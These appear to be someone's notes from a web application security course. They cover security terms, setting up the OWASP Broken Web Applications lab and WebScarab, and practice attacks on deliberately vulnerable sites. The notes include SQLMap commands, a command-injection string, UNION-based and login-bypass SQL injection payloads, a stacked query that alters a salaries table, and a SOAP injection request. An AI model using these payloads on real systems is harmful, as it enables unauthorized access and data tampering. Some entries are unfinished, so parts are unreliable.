Security: 22 May 2017
Application security
End point security
Network security: Authentication
Content security
One-factor authentication
Two-factor authentication. Ex: ATM card & PIN
Content Security:
Public data: Username
Private data: Password
Confidentiality: Encryption
Encryption + Decryption = Cryptography
Integrity: Hash code for checking the completeness of the data received from the sender
Security Trio:
All three of the below cannot be obtained at once: if the application is made more secure, ease of use suffers.
1 Security
2 Functionality
3 Ease of Use
Security Terminology:
1. Asset:
Tangible asset: Physical assets
Intangible asset: Software and Licenses
2. Threat: Potential harm to an asset from an intruder
3. Vulnerability: Weakness in the application
4. Attack:
5. Exploit: Stealing the data, to the intruder's benefit
6. Payload: The query the attacker writes to get the data
7. Zero-Day: Attack with no solution yet. Initially SQL injection had no solution.
8. Risk
Security Control:
OWASP: Open Web Application Security Project
Attack Surface:
Attack surface is the sum total of all the vulnerabilities in an application.
Ex: User input, protocols, interfaces
Elements of Security:
1. Confidentiality
2. Integrity
3. Availability: Negative factor is Denial of Service
Authorization: Access Control
Authentication: Identification of whether the user is valid or not
Non-Repudiation:
Digital Certificate:
SHA: Secure Hash Algorithm
MD5: Message Digest
RSA
Kinds of Attack:
Injection:
Command
Code
SQL injection
SQL injection:
Numerical SQL Injection
String SQL Injection
WebScarab tool for editing the request and response
Blind SQL Injection
To know the database, tables and contents of the website, the Kali 2016 OS with the SQLMap tool can be used.
There are several commands with which we can get all the details, whenever there is an error in the page.
ex: sqlmap -h (for help)
sqlmap -u "websiteurl" --dbs (for getting the database names)
Cross-Site Scripting:
1. Stored / Persistent
2. Reflected / Temporary (non-persistent)
Cross-Site Request Forgery (CSRF/XSRF): in .NET it is also called the view state one-click attack
Lab for Web Security Testing
Download the VMware free version from the VMware website.
Install the exe.
Download: OWASP BWA
Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications that is distributed on a Virtual Machine in VMware format compatible with their no-cost and commercial VMware products.
https://sourceforge.net/projects/owaspbwa/files/
The size is 1.8 GB in Zip format. After extracting it is around 6 GB across multiple files. (reference file)
Download WebScarab from the URL.
The file is 5 MB; open the .jar file.
Click on Next until the installation finishes.
After it finishes, we can find the following files extracted. Click on Webscarab.jar to open the application.
We will get the following application UI; make sure the following highlighted controls are selected for capturing the intercepted request and response.
To use WebScarab, we should change the browser proxy to localhost 127.0.0.1 and port 8008.
By now all the prerequisites are installed.
Now we need to start OWASP BWA: we can open it with the VMware Workstation application.
Power on the Virtual Machine. In the Virtual Machine window enter the credentials; here they are root & owaspbwa.
Notice the highlighted URL. It shows the IP address to connect to the Virtual Machine web apps.
Enter the IP address in the client browser (local system) and hit Enter. The request first passes through the proxy settings. Here the proxy is set as 127.0.0.1 8008. An Edit Request popup will appear as shown below.
Here Intercept requests and Intercept responses are selected. This means all requests and responses must pass through this Edit Request proxy control.
Now we have all fields of the request header; we can change the content as we require and then click on Apply Changes. Now again the response from the server will
(screenshot: Edit Request popup)
Example of String reversal: (screenshot: edited request)
Example 2:
Command Injection:
" & ipconfig & netstat -an"
Example 3:
Ex: Hit the URL demo.testfire.net
Enter the HTML script into the text field; ideally the HTML script should not execute in any text field.
<html><body><input type="text" /></body></html>
Ex: Injecting an error
On this website, at the end of the query URL I am adding an apostrophe so that the resulting error reveals database details. Here we learn that the database used is MySQL.
Getting the number of records in the table:
Another query:
Here id=-1 returns no data from the table, and we make a UNION with the database() name and user(), so their values are displayed in place of the record:
www.zixem.altervista.org/SQLi/level1.php?id=-1 union select database(),user(),3
Bypassing Username and Password:
' or 1=1 or '1'='1 -- -
admin@thebodgeitstore.com' or '1'='1-- -
' or '1'='1-- -
Update queries:
abcd';update salaries set salary=5000 where userid='jsmith'-- -
abcd';select * from salaries-- -
Tools:
Web Developer tool
SOAP Testing:
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
                   xmlns:xsd="http://www.w3.org/2001/XMLSchema"
                   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <SOAP-ENV:Body>
    <ns1:getCreditCard SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/" xmlns:ns1="http://lessons">
      <id xsi:type="xsd:string">1 or 1=1</id>
    </ns1:getCreditCard>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>